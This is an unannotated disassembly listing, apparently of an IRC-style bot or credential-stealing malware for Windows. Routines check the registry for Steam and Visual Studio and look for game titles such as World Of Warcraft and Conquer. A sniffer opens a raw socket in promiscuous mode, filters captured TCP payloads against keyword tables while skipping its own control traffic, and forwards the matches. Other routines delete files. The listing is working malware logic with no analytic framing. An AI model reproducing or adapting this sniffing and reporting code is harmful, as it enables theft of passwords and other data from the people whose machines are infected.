jnz short loc_415C0E
mov [ebp+var_410], 1
loc_415C0E: ; CODE XREF: sub_415B60+A2�j
push offset aWorldOfWarcraf ; "World Of Warcraft"
lea eax, [ebp+var_400]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_415C2F
mov [ebp+var_408], 1
loc_415C2F: ; CODE XREF: sub_415B60+C3�j
push offset aConquer ; "[Conquer]"
lea eax, [ebp+var_400]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_415C50
mov [ebp+var_404], 1
loc_415C50: ; CODE XREF: sub_415B60+E4�j
jmp loc_415BB5
; ---------------------------------------------------------------------------
loc_415C55: ; CODE XREF: sub_415B60+6C�j
and [ebp+var_5C0], 0
lea eax, [ebp+var_5C0]
push eax
push 20019h
push 0
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\VisualStudio\\6.0\\Set"...
push 80000002h
call dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_415C88
mov [ebp+var_5C4], 1
loc_415C88: ; CODE XREF: sub_415B60+11C�j
push [ebp+var_5C0]
call dword_417028 ; RegCloseKey
and [ebp+var_5C0], 0
lea eax, [ebp+var_5C0]
push eax
push 20019h
push 0
push offset aSoftwareValveS ; "Software\\Valve\\Steam"
push 80000001h
call dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_415CC7
mov [ebp+var_40C], 1
loc_415CC7: ; CODE XREF: sub_415B60+15B�j
push [ebp+var_5C0]
call dword_417028 ; RegCloseKey
movsx eax, [ebp+var_41C]
test eax, eax
jz short loc_415D1E
cmp [ebp+var_410], 0
jnz short loc_415D1E
cmp [ebp+var_5C4], 0
jnz short loc_415D1E
cmp [ebp+var_40C], 0
jnz short loc_415D1E
cmp [ebp+var_408], 0
jnz short loc_415D1E
cmp [ebp+var_404], 0
jnz short loc_415D1E
push [ebp+var_5B8]
call sub_409763
pop ecx
xor eax, eax
jmp locret_415DF9
; ---------------------------------------------------------------------------
loc_415D1E: ; CODE XREF: sub_415B60+17C�j
; sub_415B60+185�j ...
cmp [ebp+var_404], 0
jz short loc_415D33
mov [ebp+var_5C8], offset aYes ; "Yes"
jmp short loc_415D3D
; ---------------------------------------------------------------------------
loc_415D33: ; CODE XREF: sub_415B60+1C5�j
mov [ebp+var_5C8], offset aNo ; "No"
loc_415D3D: ; CODE XREF: sub_415B60+1D1�j
cmp [ebp+var_408], 0
jz short loc_415D52
mov [ebp+var_5CC], offset aYes ; "Yes"
jmp short loc_415D5C
; ---------------------------------------------------------------------------
loc_415D52: ; CODE XREF: sub_415B60+1E4�j
mov [ebp+var_5CC], offset aNo ; "No"
loc_415D5C: ; CODE XREF: sub_415B60+1F0�j
cmp [ebp+var_40C], 0
jz short loc_415D71
mov [ebp+var_5D0], offset aYes ; "Yes"
jmp short loc_415D7B
; ---------------------------------------------------------------------------
loc_415D71: ; CODE XREF: sub_415B60+203�j
mov [ebp+var_5D0], offset aNo ; "No"
loc_415D7B: ; CODE XREF: sub_415B60+20F�j
cmp [ebp+var_5C4], 0
jz short loc_415D90
mov [ebp+var_5D4], offset aYes ; "Yes"
jmp short loc_415D9A
; ---------------------------------------------------------------------------
loc_415D90: ; CODE XREF: sub_415B60+222�j
mov [ebp+var_5D4], offset aNo ; "No"
loc_415D9A: ; CODE XREF: sub_415B60+22E�j
cmp [ebp+var_410], 0
jz short loc_415DAF
mov [ebp+var_5D8], offset aYes ; "Yes"
jmp short loc_415DB9
; ---------------------------------------------------------------------------
loc_415DAF: ; CODE XREF: sub_415B60+241�j
mov [ebp+var_5D8], offset aNo ; "No"
loc_415DB9: ; CODE XREF: sub_415B60+24D�j
push [ebp+var_5C8]
push [ebp+var_5CC]
push [ebp+var_5D0]
push [ebp+var_5D4]
push [ebp+var_5D8]
push offset dword_41D63C
lea eax, [ebp+var_5B4]
push eax
call sub_40D53F
add esp, 1Ch
push [ebp+var_5B8]
call sub_409763
pop ecx
xor eax, eax
locret_415DF9: ; CODE XREF: sub_415B60+1B9�j
leave
retn 4
sub_415B60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415DFD proc near ; CODE XREF: sub_40A9CF+12FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415E17
jmp short locret_415E3F
; ---------------------------------------------------------------------------
loc_415E17: ; CODE XREF: sub_415DFD+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aListingInteres ; "Listing interesting processes"
push 0
push [ebp+var_4]
push offset sub_415B60
call sub_4095A4
add esp, 10h
locret_415E3F: ; CODE XREF: sub_415DFD+18�j
leave
retn
sub_415DFD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415E41 proc near ; CODE XREF: sub_415EB7+37�p
; sub_415EB7+59�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_415E52
; ---------------------------------------------------------------------------
loc_415E4B: ; CODE XREF: sub_415E41+69�j
; sub_415E41:loc_415EB1�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_415E52: ; CODE XREF: sub_415E41+8�j
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax*4], 0
jz short loc_415EB3
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EB1
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax*4+4], 0
jz short loc_415EAC
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EAC
jmp short loc_415E4B
; ---------------------------------------------------------------------------
loc_415EAC: ; CODE XREF: sub_415E41+49�j
; sub_415E41+67�j
push 1
pop eax
jmp short locret_415EB5
; ---------------------------------------------------------------------------
loc_415EB1: ; CODE XREF: sub_415E41+3A�j
jmp short loc_415E4B
; ---------------------------------------------------------------------------
loc_415EB3: ; CODE XREF: sub_415E41+1D�j
xor eax, eax
locret_415EB5: ; CODE XREF: sub_415E41+6E�j
leave
retn
sub_415E41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415EB7 proc near ; CODE XREF: sub_415F69+420�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_C], 0
jz short loc_415EDD
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EDD
push 1
pop eax
jmp loc_415F67
; ---------------------------------------------------------------------------
loc_415EDD: ; CODE XREF: sub_415EB7+7�j
; sub_415EB7+1C�j
cmp [ebp+arg_8], 1
jb short loc_415EFF
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D76C
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415EFF
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415EFF: ; CODE XREF: sub_415EB7+2A�j
; sub_415EB7+41�j
cmp [ebp+arg_8], 2
jb short loc_415F21
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D7C8
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F21
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F21: ; CODE XREF: sub_415EB7+4C�j
; sub_415EB7+63�j
cmp [ebp+arg_8], 3
jb short loc_415F43
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D83C
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F43
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F43: ; CODE XREF: sub_415EB7+6E�j
; sub_415EB7+85�j
cmp [ebp+arg_8], 4
jb short loc_415F65
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D880
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F65
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F65: ; CODE XREF: sub_415EB7+90�j
; sub_415EB7+A7�j
xor eax, eax
loc_415F67: ; CODE XREF: sub_415EB7+21�j
; sub_415EB7+46�j ...
pop ebp
retn
sub_415EB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F69 proc near ; DATA XREF: sub_41665C+A6�o
var_19B8 = dword ptr -19B8h
var_19B4 = byte ptr -19B4h
var_18B4 = dword ptr -18B4h
var_18B0 = byte ptr -18B0h
var_17B0 = dword ptr -17B0h
var_17AC = dword ptr -17ACh
var_17A8 = byte ptr -17A8h
var_1628 = dword ptr -1628h
var_1624 = dword ptr -1624h
var_1620 = byte ptr -1620h
var_161C = dword ptr -161Ch
var_1618 = dword ptr -1618h
var_1614 = dword ptr -1614h
var_1610 = dword ptr -1610h
var_160C = byte ptr -160Ch
var_140C = byte ptr -140Ch
var_127E = byte ptr -127Eh
var_1278 = byte ptr -1278h
var_1274 = byte ptr -1274h
var_1268 = word ptr -1268h
var_1264 = byte ptr -1264h
var_1263 = byte ptr -1263h
var_125C = dword ptr -125Ch
var_1258 = word ptr -1258h
var_1254 = byte ptr -1254h
var_1154 = dword ptr -1154h
var_1150 = dword ptr -1150h
var_114C = byte ptr -114Ch
var_114B = byte ptr -114Bh
var_104C = dword ptr -104Ch
var_1048 = word ptr -1048h
var_1044 = dword ptr -1044h
var_1038 = byte ptr -1038h
var_1037 = byte ptr -1037h
var_1030 = byte ptr -1030h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 19B8h
call sub_416BC0
push edi
push 3ABh
push [ebp+arg_0]
lea eax, [ebp+var_1614]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movsx eax, [ebp+var_160C]
neg eax
sbb eax, eax
lea ecx, [ebp+var_160C]
and eax, ecx
mov [ebp+var_1624], eax
push 0
push 3
push 2
call dword_417218 ; socket
mov [ebp+var_104C], eax
cmp [ebp+var_104C], 0FFFFFFFFh
jnz short loc_415FDE
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_415FDE: ; CODE XREF: sub_415F69+60�j
push 0FFh
lea eax, [ebp+var_1254]
push eax
call dword_417260 ; gethostname
lea eax, [ebp+var_1254]
push eax
call dword_41723C ; gethostbyname
mov [ebp+var_1154], eax
cmp [ebp+var_1154], 0
jnz short loc_41602B
push [ebp+var_104C]
call dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_41602B: ; CODE XREF: sub_415F69+A1�j
push 10h
push 0
lea eax, [ebp+var_1048]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_1048], 2
mov eax, [ebp+var_1154]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_1044], eax
push 10h
lea eax, [ebp+var_1048]
push eax
push [ebp+var_104C]
call dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_416093
push [ebp+var_104C]
call dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_416093: ; CODE XREF: sub_415F69+109�j
mov [ebp+var_1150], 1
push 0
push 0
lea eax, [ebp+var_1620]
push eax
push 0
push 0
push 4
lea eax, [ebp+var_1150]
push eax
push 98000001h
push [ebp+var_104C]
call dword_41725C ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4160EA
push [ebp+var_104C]
call dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_4160EA: ; CODE XREF: sub_415F69+160�j
lea eax, [ebp+var_1030]
mov [ebp+var_161C], eax
and [ebp+var_1628], 0
and [ebp+var_4], 0
push [ebp+var_1610]
mov eax, [ebp+var_1614]
push dword ptr [eax]
push offset unk_41DA4C
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 10h
and [ebp+var_1274], 0
and [ebp+var_114C], 0
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_114B]
rep stosd
stosw
stosb
and [ebp+var_1264], 0
xor eax, eax
lea edi, [ebp+var_1263]
stosd
stosb
lea eax, [ebp+var_114C]
push eax
call sub_40CF25
push eax
call sub_4044F7
pop ecx
pop ecx
lea eax, [ebp+var_1264]
push eax
call sub_40CF25
push eax
call sub_4045B2
pop ecx
pop ecx
lea eax, [ebp+var_114C]
push eax
call dword_417244 ; inet_addr
mov [ebp+var_1618], eax
lea eax, [ebp+var_1264]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1268], ax
and [ebp+var_1038], 0
xor eax, eax
lea edi, [ebp+var_1037]
stosd
stosb
lea eax, [ebp+var_1038]
push eax
call sub_40CF25
push eax
call sub_404552
pop ecx
pop ecx
mov eax, [ebp+var_1044]
mov [ebp+var_125C], eax
lea eax, [ebp+var_1038]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1258], ax
loc_4161E6: ; CODE XREF: sub_415F69+305�j
; sub_415F69+33A�j ...
push 0
push 1028h
lea eax, [ebp+var_1030]
push eax
push [ebp+var_104C]
call dword_417248 ; recv
mov [ebp+var_17AC], eax
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_416217
jmp loc_416637
; ---------------------------------------------------------------------------
loc_416217: ; CODE XREF: sub_415F69+2A7�j
cmp [ebp+var_17AC], 0FFFFFFFFh
jz short loc_416229
cmp [ebp+var_17AC], 0
jnz short loc_41622E
loc_416229: ; CODE XREF: sub_415F69+2B5�j
jmp loc_416637
; ---------------------------------------------------------------------------
loc_41622E: ; CODE XREF: sub_415F69+2BE�j
mov eax, [ebp+var_17AC]
and [ebp+eax+var_1030], 0
mov eax, [ebp+var_161C]
mov al, [eax]
and al, 0Fh
movzx eax, al
mov ecx, [ebp+var_161C]
lea eax, [ecx+eax*4]
mov [ebp+var_1628], eax
mov eax, [ebp+var_1628]
lea ecx, [ebp+var_1030]
sub eax, ecx
cmp eax, [ebp+var_17AC]
jb short loc_416273
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416273: ; CODE XREF: sub_415F69+303�j
mov eax, [ebp+var_1628]
mov al, [eax+0Ch]
shr al, 4
and al, 0Fh
movzx eax, al
mov ecx, [ebp+var_1628]
lea eax, [ecx+eax*4]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lea ecx, [ebp+var_1030]
sub eax, ecx
cmp eax, [ebp+var_17AC]
jb short loc_4162A8
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4162A8: ; CODE XREF: sub_415F69+338�j
push [ebp+var_4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_17AC], eax
mov eax, [ebp+var_161C]
movzx eax, byte ptr [eax+9]
cmp eax, 6
jnz loc_416632
movsx eax, [ebp+var_127E]
test eax, eax
jz short loc_4162EB
mov eax, [ebp+var_161C]
mov eax, [eax+10h]
cmp eax, [ebp+var_125C]
jz short loc_4162EB
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4162EB: ; CODE XREF: sub_415F69+36A�j
; sub_415F69+37B�j
movsx eax, [ebp+var_1278]
test eax, eax
jz short loc_41630C
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_125C]
jz short loc_41630C
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_41630C: ; CODE XREF: sub_415F69+38B�j
; sub_415F69+39C�j
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call dword_417238 ; ntohs
movzx eax, ax
movzx ecx, [ebp+var_1258]
cmp eax, ecx
jnz short loc_416340
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_125C]
jnz short loc_416340
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416340: ; CODE XREF: sub_415F69+3BF�j
; sub_415F69+3D0�j
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call dword_417238 ; ntohs
movzx eax, ax
movzx ecx, [ebp+var_1268]
cmp eax, ecx
jnz short loc_416374
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_1618]
jnz short loc_416374
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416374: ; CODE XREF: sub_415F69+3F3�j
; sub_415F69+404�j
push [ebp+var_1624]
push [ebp+var_1610]
push [ebp+var_17AC]
push [ebp+var_4]
call sub_415EB7
add esp, 10h
test eax, eax
jz loc_416632
and [ebp+var_19B8], 0
jmp short loc_4163AF
; ---------------------------------------------------------------------------
loc_4163A2: ; CODE XREF: sub_415F69:loc_416413�j
mov eax, [ebp+var_19B8]
inc eax
mov [ebp+var_19B8], eax
loc_4163AF: ; CODE XREF: sub_415F69+437�j
mov eax, [ebp+var_19B8]
cmp eax, [ebp+var_17AC]
jnb short loc_416415
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_4163DA
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 2Dh
loc_4163DA: ; CODE XREF: sub_415F69+463�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_4163F7
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 3Eh
loc_4163F7: ; CODE XREF: sub_415F69+480�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_416413
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 2Eh
loc_416413: ; CODE XREF: sub_415F69+49C�j
jmp short loc_4163A2
; ---------------------------------------------------------------------------
loc_416415: ; CODE XREF: sub_415F69+452�j
and [ebp+var_19B8], 0
mov eax, [ebp+var_19B8]
mov [ebp+var_17AC], eax
jmp short loc_416437
; ---------------------------------------------------------------------------
loc_41642A: ; CODE XREF: sub_415F69+507�j
; sub_415F69+51A�j ...
mov eax, [ebp+var_19B8]
inc eax
mov [ebp+var_19B8], eax
loc_416437: ; CODE XREF: sub_415F69+4BF�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_41645F
mov eax, [ebp+var_4]
add eax, [ebp+var_17AC]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_19B8]
mov cl, [ecx]
mov [eax], cl
jmp short loc_4164AA
; ---------------------------------------------------------------------------
loc_41645F: ; CODE XREF: sub_415F69+4DC�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 7Fh
jl short loc_416472
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_416472: ; CODE XREF: sub_415F69+505�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jg short loc_416485
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_416485: ; CODE XREF: sub_415F69+518�j
mov eax, [ebp+var_4]
add eax, [ebp+var_17AC]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_19B8]
mov cl, [ecx]
mov [eax], cl
mov eax, [ebp+var_17AC]
inc eax
mov [ebp+var_17AC], eax
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_4164AA: ; CODE XREF: sub_415F69+4F4�j
cmp [ebp+var_17AC], 0
jnz short loc_4164B8
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4164B8: ; CODE XREF: sub_415F69+548�j
push 100h
mov eax, [ebp+var_161C]
push dword ptr [eax+0Ch]
call dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_19B4]
push eax
call sub_407A56
add esp, 0Ch
push 100h
mov eax, [ebp+var_161C]
push dword ptr [eax+10h]
call dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_18B0]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_1628]
mov ax, [eax+2]
push eax
call dword_417238 ; ntohs
movzx eax, ax
push eax
lea eax, [ebp+var_18B0]
push eax
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call dword_417238 ; ntohs
movzx eax, ax
push eax
lea eax, [ebp+var_19B4]
push eax
push offset dword_41DA18
lea eax, [ebp+var_17A8]
push eax
call sub_416B5E ; sprintf
add esp, 18h
mov [ebp+var_18B4], eax
mov eax, 180h
sub eax, [ebp+var_18B4]
push eax
push [ebp+var_4]
mov eax, [ebp+var_18B4]
lea eax, [ebp+eax+var_17A8]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_17A8]
push eax
push offset dword_418B64
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 0Ch
push 3E8h
call dword_41709C ; Sleep
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_4165AD
jmp loc_416655
; ---------------------------------------------------------------------------
loc_4165AD: ; CODE XREF: sub_415F69+63D�j
mov eax, 180h
sub eax, [ebp+var_18B4]
dec eax
mov [ebp+var_17B0], eax
loc_4165BF: ; CODE XREF: sub_415F69+6C7�j
mov eax, [ebp+var_17B0]
cmp eax, [ebp+var_17AC]
jnb short loc_416632
push 180h
mov eax, [ebp+var_4]
add eax, [ebp+var_17B0]
push eax
lea eax, [ebp+var_17A8]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_17A8]
push eax
push offset dword_418B64
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 0Ch
push 3E8h
call dword_41709C ; Sleep
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_41661F
jmp short loc_416653
; ---------------------------------------------------------------------------
loc_41661F: ; CODE XREF: sub_415F69+6B2�j
mov eax, [ebp+var_17B0]
add eax, 17Fh
mov [ebp+var_17B0], eax
jmp short loc_4165BF
; ---------------------------------------------------------------------------
loc_416632: ; CODE XREF: sub_415F69+35B�j
; sub_415F69+42A�j ...
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416637: ; CODE XREF: sub_415F69+2A9�j
; sub_415F69:loc_416229�j ...
push [ebp+var_104C]
call dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_416657
; ---------------------------------------------------------------------------
loc_416653: ; CODE XREF: sub_415F69+6B4�j
jmp short loc_416637
; ---------------------------------------------------------------------------
loc_416655: ; CODE XREF: sub_415F69+63F�j
jmp short loc_416637
; ---------------------------------------------------------------------------
loc_416657: ; CODE XREF: sub_415F69+70�j
; sub_415F69+BD�j ...
pop edi
leave
retn 4
sub_415F69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41665C proc near ; CODE XREF: sub_40A9CF+9FE�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push 3ABh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41667B
jmp locret_41670F
; ---------------------------------------------------------------------------
loc_41667B: ; CODE XREF: sub_41665C+18�j
cmp [ebp+arg_4], 0
jz short loc_41668F
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
jmp short loc_416696
; ---------------------------------------------------------------------------
loc_41668F: ; CODE XREF: sub_41665C+23�j
mov [ebp+var_8], 3
loc_416696: ; CODE XREF: sub_41665C+31�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+4], ecx
cmp [ebp+arg_8], 0
jz short loc_4166AD
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
jmp short loc_4166B4
; ---------------------------------------------------------------------------
loc_4166AD: ; CODE XREF: sub_41665C+47�j
mov [ebp+var_C], offset byte_41DEC0
loc_4166B4: ; CODE XREF: sub_41665C+4F�j
push 200h
push [ebp+var_C]
mov eax, [ebp+var_4]
add eax, 8
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 208h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
push dword ptr [eax+4]
push offset dword_41DA80
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_415F69
call sub_4095A4
add esp, 14h
locret_41670F: ; CODE XREF: sub_41665C+1A�j
leave
retn
sub_41665C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416711 proc near ; CODE XREF: sub_4167B9+6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41673B
push [ebp+var_4]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_41673D
; ---------------------------------------------------------------------------
loc_41673B: ; CODE XREF: sub_416711+1A�j
xor eax, eax
locret_41673D: ; CODE XREF: sub_416711+28�j
leave
retn
sub_416711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41673F proc near ; CODE XREF: sub_40A9CF+C23�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41679C
push 2
push 0
push [ebp+var_4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_8], eax
push 0
push 0
push [ebp+var_4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_4]
call sub_416B82 ; fclose
pop ecx
mov eax, [ebp+var_8]
inc eax
neg eax
sbb eax, eax
and eax, [ebp+var_8]
jmp short locret_41679E
; ---------------------------------------------------------------------------
loc_41679C: ; CODE XREF: sub_41673F+1B�j
xor eax, eax
locret_41679E: ; CODE XREF: sub_41673F+5B�j
leave
retn
sub_41673F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167A0 proc near ; CODE XREF: sub_4167B9+13�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call dword_4170AC ; DeleteFileA
test eax, eax
jz short loc_4167B5
push 1
pop eax
jmp short loc_4167B7
; ---------------------------------------------------------------------------
loc_4167B5: ; CODE XREF: sub_4167A0+E�j
xor eax, eax
loc_4167B7: ; CODE XREF: sub_4167A0+13�j
pop ebp
retn
sub_4167A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167B9 proc near ; CODE XREF: sub_402698+1D9�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_416711
pop ecx
test eax, eax
jz short loc_4167D9
push [ebp+arg_0]
call sub_4167A0
pop ecx
neg eax
sbb eax, eax
inc eax
jmp short loc_4167DB
; ---------------------------------------------------------------------------
loc_4167D9: ; CODE XREF: sub_4167B9+E�j
xor eax, eax
loc_4167DB: ; CODE XREF: sub_4167B9+1E�j
pop ebp
retn
sub_4167B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167DD proc near ; CODE XREF: sub_40A9CF+8E9�p
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
push dword ptr [eax]
call sub_40ED38
pop ecx
mov [ebp+var_4], eax
leave
retn
sub_4167DD endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417298
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 12DCh
call sub_416BC0
push ebx
push esi
push edi
mov [ebp-18h], esp
push 2
call dword_4170F4 ; SetErrorMode
and dword ptr [ebp-4], 0
push dword_41DAC4
push dword_41DAC0
push 3B7h
push dword_41DABC
push 0
push dword_41DAB8
push offset a08xX08x3x08x08 ; "%08x%x%08x%3x%08x%08x"
lea eax, [ebp-115Ch]
push eax
call sub_416B5E ; sprintf
add esp, 20h
and dword ptr [ebp-1128h], 0
jmp short loc_416875
; ---------------------------------------------------------------------------
loc_416868: ; CODE XREF: .packed:loc_4168BA�j
mov eax, [ebp-1128h]
inc eax
mov [ebp-1128h], eax
loc_416875: ; CODE XREF: .packed:00416866�j
cmp dword ptr [ebp-1128h], 0Ah
jnz short loc_416883
call sub_407148
loc_416883: ; CODE XREF: .packed:0041687C�j
push 3E8h
call dword_41709C ; Sleep
lea eax, [ebp-115Ch]
push eax
push 0
